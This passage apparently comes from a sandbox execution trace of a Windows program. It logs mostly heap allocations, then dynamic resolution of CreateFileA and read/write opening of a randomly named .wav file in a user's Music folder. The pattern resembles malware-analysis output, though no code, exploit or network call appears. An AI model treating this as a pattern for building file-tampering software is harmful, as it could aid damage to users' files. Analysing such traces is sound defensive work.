hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0184.859] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0184.859] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0184.859] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0184.859] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0184.859] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0184.859] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0184.859] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0184.859] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0184.859] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0184.860] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0184.860] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0184.860] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0184.860] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0184.860] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0184.860] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0184.860] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0184.860] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0184.860] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0a8 [0184.860] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0184.860] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0184.860] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0184.860] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0184.860] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0184.860] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0184.860] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0184.860] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0184.860] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0184.860] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0184.860] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0184.860] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0184.860] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0184.860] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0184.860] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0184.860] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0184.860] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0184.860] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0184.860] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0184.861] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0184.861] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0184.861] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0184.861] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0184.861] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0184.861] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0184.861] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0184.861] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0184.861] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0184.861] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0184.861] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0b78 [0184.861] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0184.861] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0184.861] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0184.861] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0184.861] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0184.861] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0184.861] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0184.861] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0184.861] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0184.861] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0184.861] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0184.861] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0184.861] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0184.861] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0184.861] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0184.862] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0184.862] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0184.862] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0184.862] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0184.862] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0184.862] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0184.862] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0184.862] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0184.862] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0184.862] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0184.862] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0184.862] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0184.862] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0184.862] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0184.862] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0184.862] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0184.862] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0184.862] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0184.862] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0184.862] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0184.862] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0184.862] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0184.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0184.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0184.863] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0184.863] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0184.863] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0184.863] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0184.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0184.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0184.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0184.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0184.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0184.863] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0184.863] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0184.863] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0184.863] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0184.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0184.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0184.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0184.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0184.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0184.863] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0184.863] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0184.863] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0184.863] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0184.864] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0184.864] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0184.864] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0184.864] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0184.864] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0184.864] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0184.864] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0184.864] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0184.864] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0184.864] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0184.864] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0184.864] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0184.864] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0184.864] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0184.864] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0184.864] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0184.864] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0184.864] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0184.864] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0184.864] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0184.865] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0184.865] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0184.865] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb) returned 0x9bd5b8 [0184.865] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x9bd5b8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0184.865] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0184.865] GetProcAddress (hModule=0x75990000, lpProcName="CreateFile") returned 0x0 [0184.865] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0184.865] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0184.865] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0184.865] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0184.865] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0184.865] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0184.865] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0184.865] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd5b8 [0184.865] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x9bd5b8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0184.865] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0184.866] GetProcAddress (hModule=0x75990000, lpProcName="CreateFileA") returned 0x759a53c6 [0184.866] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0184.866] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0184.866] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0184.866] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0184.866] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0184.866] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0184.866] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0184.866] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0184.866] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0184.866] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0184.866] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0184.866] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0184.866] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10001) returned 0xbca008 [0184.867] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\APDdf3aoZrXaHEczyAP.wav", cchWideChar=86, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 86 [0184.867] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x56) returned 0x8c4a48 [0184.867] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\APDdf3aoZrXaHEczyAP.wav", cchWideChar=86, lpMultiByteStr=0x8c4a48, cbMultiByte=86, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\APDdf3aoZrXaHEczyAP.wav", lpUsedDefaultChar=0x0) returned 86 [0184.867] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8c4a48 | out: hHeap=0x8a0000) returned 1 [0184.867] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0184.867] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0184.867] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0184.867] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0184.867] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0184.867] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0184.868] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0184.868] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0184.868] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\APDdf3aoZrXaHEczyAP.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\etyjolzsqisxnk0ol\\fgmpl3n\\apddf3aozrxaheczyap.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0184.870] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0184.870] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0184.870] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0184.870] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0184.870] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0184.870] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0184.870] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0184.871] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0184.871] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0184.871] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0184.871] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0184.871] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0184.871] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0184.871] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0184.871] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xbca008, cbMultiByte=86, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 86 [0184.871] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xac) returned 0x8e6d90 [0184.871] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xbca008, cbMultiByte=86, lpWideCharStr=0x8e6d90, cchWideChar=86 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\APDdf3aoZrXaHEczyAP.wav") returned 86 [0184.871] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0184.871] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb0) returned 0x8e6f00 [0184.871] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e6d90 | out: hHeap=0x8a0000) returned 1 [0184.871] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0184.871] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0184.871] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0184.871] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0184.871] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0184.871] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0184.871] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0184.871] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0184.871] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0184.871] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0184.871] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0184.871] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0184.871] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0184.871] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0184.871] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0184.871] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0184.872] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0184.872] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0184.872] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0184.872] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0184.872] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0184.872] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0184.872] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0184.872] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0184.872] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0184.872] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0184.872] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0184.872] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0184.872] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0184.872] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0184.872] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0184.872] 